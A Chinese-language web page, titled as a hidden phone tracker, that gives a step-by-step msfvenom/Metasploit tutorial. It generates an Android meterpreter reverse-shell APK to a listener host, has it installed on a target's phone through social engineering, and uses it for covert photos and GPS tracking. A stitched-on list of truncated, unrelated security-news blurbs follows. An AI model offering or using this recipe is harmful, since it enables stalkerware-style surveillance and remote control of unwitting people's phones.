手机定位录音追踪器(放手机里的微型定位器)MsfvenomKali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msf
手机定位录音追踪器(放手机里的微型定位器)
Kali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。
比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msfvenom,接下来我们看看使用的 *** 。
kali终端下输入:
msfvenom -h 查看使用帮助
其中我们要关注的参数是,-p(指定攻击有效载荷)-f(指定生成文件的格式)
msfvenom -l payload *** sfvenom -l formats
生成远控的完整命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R> test.apk
这里没有使用-f参数,生成安卓可执行程序,可以不用。
部署可执行程序
将生成的安卓远控app安装在目标靶机中,可以通过搭建服务器,让目标下载安装apk。
启动msf
Kali终端下输入:msfconsole
继续输入:
use exploit/multi/handler
本模块专门用于设置独立的连接受理程序,这是我们寻找的最后一块拼图!在这种使用远控载荷的情况下,设置multi/handler是必须的,否则无法进程远程控制。
为该模块设置参数:
show optionsset LHOST 192.168.31.111set lport 8888
这里的设置必须和前面用msfvenom的设置保持一致。
run执行侦听,等待上线
得到meterpreter会话
一旦目标安卓手机(靶机)用户点击了我们生成的test.apk图标,我们的kali就会监听到连接信号,得到一个远程控制目标(靶机)手机的meterpreter会话。
输入"?"即可显示所有远程控制安卓手机的命令,我们这里选择最精彩的三个:
远程拍照:目标手机不会有任何察觉,属于后台系统拍照;
gps定位:直接显示经纬度地理位置,非常精准;
据Security affairs网站消息,4月21日,安全研究人员Khaled Nassar在Github上公开了Java 中新披露的数字签名绕过漏洞的PoC代码,该漏洞被追踪为CVE-2022-21449(CVSS 分数:7.5)。 漏洞的影响范围主要涉及 Java SE 和 Oracle Gr...
因担心俄乌冲突引发的近期针对欧洲卫星网络发起的攻击可能很快蔓延到美国本土,政府机构已经向卫星通信网络运营商发出了“潜在威胁”预警。在美国网络安全与基础设施安全局(CISA)和联邦调查局(FBI)本周联合发布的一份公告中,其敦促卫星通讯(SATCOM)网络提供商和基础设施组织加强安全防御。若被入侵,或...
微软今天宣布近日捣毁了一个名为 ZLoader 的主要犯罪僵尸网络,这也是使用 XLM 宏作为攻击面的僵尸网络之一。微软的最新行动包括技术和法律活动,以破坏利用 ZLoader 作为恶意软件即服务(malware-as-a-service)的犯罪集团的运作。 在本次捣毁行动中,微软还锁定了一位开发...
眼下,勒索软件已经成为互联网上的一种趋势,它的目标包括企业、政府机构、医院和学校。这是一个几十年前就存在的问题,但在过去几年中变得非常普遍。最初,黑客以个人为目标,要求提供几百美元的比特币,但现在他们追求更大的目标,他们可以勒索更大的金额,并且被勒索放在没有电脑和服务器的情况下无法继续正常使用 密...
白俄罗斯政府被指控至少对欧洲的Ghostwriters攻击事件负有部分责任。虽然网络安全公司在涉及威胁集团的归属时通常会谨慎行事,但Mandiant表示,它有高度的信心认为Ghostwriter–同时跟UNC115活动也有关联–是一个可能代表该国政府的网络犯罪组织。 今年早些时候,在一架商业飞机被...
早在 5 月,微软就认定有俄罗斯背景的 NOBELIUM 黑客组织要对持续数月的 SolarWinds 网络攻击事件负责,并同企业、政府和执法机构达成了合作,以遏制此类网络攻击的负面影响。早些时候,微软更进一步地剖析了 NOBELIUM 使用的一套更加复杂的恶意软件传送方法。可知其用于造成破坏,并获...